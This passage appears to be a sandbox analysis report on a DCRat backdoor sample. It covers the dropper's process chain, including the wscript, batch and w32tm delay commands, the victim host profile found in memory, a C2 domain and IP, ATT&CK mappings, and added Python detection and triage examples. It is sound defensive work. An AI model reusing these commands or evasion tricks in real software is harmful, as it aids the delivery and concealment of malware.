            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8B710 GetProcessHeap
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Process token adjusted: Debug
            Source: C:\Program Files\7-Zip\Lang\System.exe | Process token adjusted: Debug
            Source: C:\Program Files\7-Zip\Lang\System.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7F063 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ChainBlocksurrogateagentFont\portperf.exe "C:\ChainBlocksurrogateagentFont\portperf.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
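            The process chain above is what a detection rule should key on: wscript.exe running a .vbe from a folder created directly under the drive root, cmd.exe running a .bat from the user's Temp folder, a dropped executable launched from that same root folder, and w32tm /stripchart pointed at localhost, which polls the local clock for a few seconds and serves as a sleep that needs no sleep API. The Python below is an added example written for this page, not code from the report or from DCRat. The process events it runs over are constructed to mirror the chain shown, with one benign w32tm invocation against a real time source added as a control; the rule names and the allow-list of standard root folders are this example's own assumptions.

```python
import re

# Top-level folders an executable or script is normally launched from; anything
# else directly under the drive root (here C:\ChainBlocksurrogateagentFont) is
# treated as attacker-created. The allow-list is this example's own assumption.
STANDARD_ROOTS = {"windows", "program files", "program files (x86)",
                  "users", "programdata", "perflogs"}

# Constructed process-creation events modelled on the chain this report shows
# (parent image, child image, child command line). They are sample data for the
# example, not records copied from the sandbox; the last event is a benign
# control (an operator checking clock offset against a real time source).
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\DCRatBuild.exe",
     "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"'},
    {"parent": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\ChainBlocksurrogateagentFont\portperf.exe",
     "cmdline": r'"C:\ChainBlocksurrogateagentFont\portperf.exe"'},
    {"parent": r"C:\ChainBlocksurrogateagentFont\portperf.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\w32tm.exe",
     "cmdline": "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\w32tm.exe",
     "cmdline": "w32tm /stripchart /computer:time.windows.com /samples:5"},
]

SCRIPT_PATH_RE = re.compile(r'"?([A-Za-z]:\\[^"]+?\.(?:vbe|vbs|js|jse|wsf))"?', re.I)

def top_level_dir(path):
    """First folder of an absolute Windows path, lower-cased; None if not absolute."""
    m = re.match(r"^[A-Za-z]:\\([^\\]+)\\", path)
    return m.group(1).lower() if m else None

def is_image(ev, *names):
    return ev["image"].lower().endswith(tuple("\\" + n for n in names))

def rule_wsh_script_from_custom_root(ev):
    """wscript/cscript running a script that lives under a non-standard root folder."""
    if not is_image(ev, "wscript.exe", "cscript.exe"):
        return False
    m = SCRIPT_PATH_RE.search(ev["cmdline"])
    return bool(m) and top_level_dir(m.group(1)) not in STANDARD_ROOTS

def rule_batch_from_user_temp(ev):
    """cmd.exe executing a .bat dropped in the user's Temp folder."""
    cl = ev["cmdline"].lower()
    return is_image(ev, "cmd.exe") and "\\appdata\\local\\temp\\" in cl and ".bat" in cl

def rule_w32tm_localhost_delay(ev):
    """w32tm /stripchart against localhost: a built-in sleep, not a time check."""
    cl = ev["cmdline"].lower()
    return is_image(ev, "w32tm.exe") and "/stripchart" in cl and "/computer:localhost" in cl

def rule_exe_from_custom_root(ev):
    """Executable launched from a folder created directly under the drive root."""
    root = top_level_dir(ev["image"])
    return root is not None and root not in STANDARD_ROOTS

RULES = {
    "wsh_script_from_custom_root": rule_wsh_script_from_custom_root,
    "batch_from_user_temp": rule_batch_from_user_temp,
    "w32tm_localhost_delay": rule_w32tm_localhost_delay,
    "exe_from_custom_root": rule_exe_from_custom_root,
}

def detect(events):
    """Map each rule that fired to the indexes of the events it matched."""
    hits = {}
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(i)
    return hits

def chain_score(events):
    """Distinct rules that fired; the chain in this report trips all four."""
    return len(detect(events))

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS).items():
        print(f"{name}: events {idx}")
```

            Each rule is weak on its own (an administrator does run w32tm, and installers do run batch files from Temp); the value is in the count of distinct rules that fire inside one process tree, which here reaches all four.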
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: merica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}H;
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: merica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managerx
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, dfVXJbANbh.exe, 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user","IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}P
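            The memory strings above are the JSON host profile the DCRat client in dfVXJbANbh.exe builds for its server: build version, machine and user name, the ipinfo-style geolocation of the sandbox's egress address, OS, admin flag, microphone and webcam presence, the foreground window and an activity state. The dump captured it several times, twice with the heap bytes that follow it ("H;" and "P") and twice cut mid-object where the dump window started. The Python below is an added example, not the report's or DCRat's own code: it recovers the first complete profile object from such a fragment with json.JSONDecoder.raw_decode, which stops at the object's closing brace and so ignores trailing bytes, refuses fragments whose opening brace is missing rather than guessing at them, and flattens the fields a responder triages first. The fragments it runs over are constructed from the strings shown here; the set of keys treated as required is this example's assumption.

```python
import json

# Constructed memory-dump fragments modelled on the strings this report lists:
# an intact profile object, one followed by heap bytes ("H;"), and one whose
# start was cut by the dump window so only its tail survives.
CHECKIN_HEAD = ('{"ServerType":"C#","ServerVer":"4.5.32","PCName":"562258","UserName":"user",'
                '"IpInfo":{"ip":"8.46.123.75","city":"New York","region":"New York","country":"US",'
                '"loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000",'
                '"timezone":"America/New_York"},')
CHECKIN_TAIL = ('"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y",'
                '"GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)",'
                '"isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager",'
                '"ActivityStatus":"{state}","SleepTimeout":5}}')

SAMPLE_FRAGMENTS = [
    CHECKIN_HEAD + CHECKIN_TAIL.format(state="Sleeping"),
    CHECKIN_HEAD + CHECKIN_TAIL.format(state="Active") + "H;",
    'merica/New_York"},' + CHECKIN_TAIL.format(state="Active"),
]

# Keys every profile object in this report carries. Treating them as required is
# this example's assumption; it keeps the nested IpInfo object from being
# mistaken for a profile when the outer brace is missing.
REQUIRED = ("ServerType", "ServerVer", "PCName", "UserName", "IpInfo",
            "WinVer", "isAdmin", "ActivityStatus", "SleepTimeout")

def extract_checkin(fragment):
    """Return the first complete profile object in fragment, or None.

    raw_decode stops at the object's closing brace, so heap bytes after it are
    ignored; a fragment whose opening brace was cut off cannot be recovered and
    is reported as None rather than patched up.
    """
    decoder = json.JSONDecoder()
    start = fragment.find("{")
    while start >= 0:
        try:
            obj, _end = decoder.raw_decode(fragment, start)
            if isinstance(obj, dict) and all(k in obj for k in REQUIRED):
                return obj
        except json.JSONDecodeError:
            pass
        start = fragment.find("{", start + 1)
    return None

def host_profile(obj):
    """Flatten the fields a responder triages first."""
    ip = obj.get("IpInfo") or {}
    return {
        "build": obj["ServerVer"],
        "victim": f'{obj["UserName"]}@{obj["PCName"]}',
        "os": obj["WinVer"],
        "admin": obj["isAdmin"] == "Y",
        "egress_ip": ip.get("ip"),
        "geo": f'{ip.get("city")}, {ip.get("country")}',
        "mic": obj.get("isMicrophone") == "Y",
        "webcam": obj.get("isWebcam") == "Y",
        "state": obj["ActivityStatus"],
        "sleep_timeout_s": int(obj["SleepTimeout"]),
    }

def triage(fragments):
    """Parse every fragment; return (profiles, number of unrecoverable fragments)."""
    profiles, unrecoverable = [], 0
    for frag in fragments:
        obj = extract_checkin(frag)
        if obj is None:
            unrecoverable += 1
        else:
            profiles.append(host_profile(obj))
    return profiles, unrecoverable

if __name__ == "__main__":
    profiles, bad = triage(SAMPLE_FRAGMENTS)
    for p in profiles:
        print(p)
    print(f"{bad} fragment(s) could not be recovered")
```

            On a real dump, feed it every string that contains "ServerType" and deduplicate the resulting profiles; the state field and the foreground window change between captures while the identity fields do not, which is why the two intact copies above differ only in ActivityStatus.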
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7ED5B cpuid
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7A63C GetLocaleInfoW,GetNumberFormatW
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Queries volume information: C:\ChainBlocksurrogateagentFont\portperf.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe VolumeInformation
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Queries volume information: C:\Users\Default\Videos\dfVXJbANbh.exe VolumeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exe | Queries volume information: C:\Program Files\7-Zip\Lang\System.exe VolumeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exe | Queries volume information: C:\Program Files\7-Zip\Lang\System.exe VolumeInformation
            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6ACF5 GetVersionExW
            Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: dfVXJbANbh.exe PID: 7248, type: MEMORYSTR
            Source: Yara match | File source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: portperf.exe PID: 3968, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: dfVXJbANbh.exe PID: 7288, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: System.exe PID: 7308, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: System.exe PID: 7336, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match; File source: 00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.0000000002664000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: dfVXJbANbh.exe PID: 7248, type: MEMORYSTR
            Source: Yara match; File source: 0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000018.00000002.2314012773.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.2222640406.0000000002B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000001A.00000002.2307312574.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000017.00000002.2314115683.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.2222640406.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: portperf.exe PID: 3968, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: dfVXJbANbh.exe PID: 7288, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 7308, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 7336, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques listed per tactic; numbers in parentheses are the badges shown next to a technique in the matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (2); Scheduled Task/Job (1); Native API (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: Scheduled Task/Job (1); Scripting (11); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: Masquerading (23); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (12); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (21); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: System Time Discovery (1); Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (3); System Information Discovery (137); System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1561293, Sample: DCRatBuild.exe, Start date: 23/11/2024, Architecture: WINDOWS, Score: 100
            (numbers in parentheses after a process name are the node badges from the graph)

            Start
            • Contacts: cy98085.tw1.ru
            • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 14 other signatures
            • Started: DCRatBuild.exe (3, 6)
              • Dropped: C:\...\portperf.exe, PE32
              • Dropped: C:\...\IQYI1ZQqki4.vbe, data
              • Started: wscript.exe (1)
                • Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                • Started: cmd.exe (1)
                  • Started: portperf.exe (3, 24)
                    • Dropped: C:\Windows\SystemTemp\...\RuntimeBroker.exe, PE32
                    • Dropped: C:\Users\Public\Music\dfVXJbANbh.exe, PE32
                    • Dropped: C:\Users\Default\Videos\dfVXJbANbh.exe, PE32
                    • Dropped: 7 other malicious files
                    • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                    • Started: cmd.exe
                      • Started: conhost.exe
                      • Started: w32tm.exe
                    • Started: schtasks.exe
                    • Started: schtasks.exe
                    • Started: 25 other processes
                  • Started: conhost.exe
            • Started: dfVXJbANbh.exe
              • Signature: Multi AV Scanner detection for dropped file
            • Started: dfVXJbANbh.exe (14, 2)
              • Contacts: cy98085.tw1.ru 185.114.245.123, ports 49723, 49729, 49730, TIMEWEB-ASRU, Russian Federation
            • Started: 2 other processes

            Source | Detection | Scanner | Label | Link
            DCRatBuild.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby | -
            DCRatBuild.exe | 55% | Virustotal | - | Browse
            DCRatBuild.exe | 100% | Avira | VBS/Runner.VPG | -
            DCRatBuild.exe | 100% | Joe Sandbox ML | - | -
            Source | Detection | Scanner | Label | Link
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe | 100% | Avira | VBS/Runner.VPG | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\portperf.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat | 100% | Avira | BAT/Delbat.C | -
            C:\Program Files\7-Zip\Lang\System.exe | 100% | Avira | HEUR/AGEN.1323984 | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\portperf.exe | 100% | Joe Sandbox ML | - | -
            C:\Program Files\7-Zip\Lang\System.exe | 100% | Joe Sandbox ML | - | -
            C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\ChainBlocksurrogateagentFont\portperf.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
            C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat | -
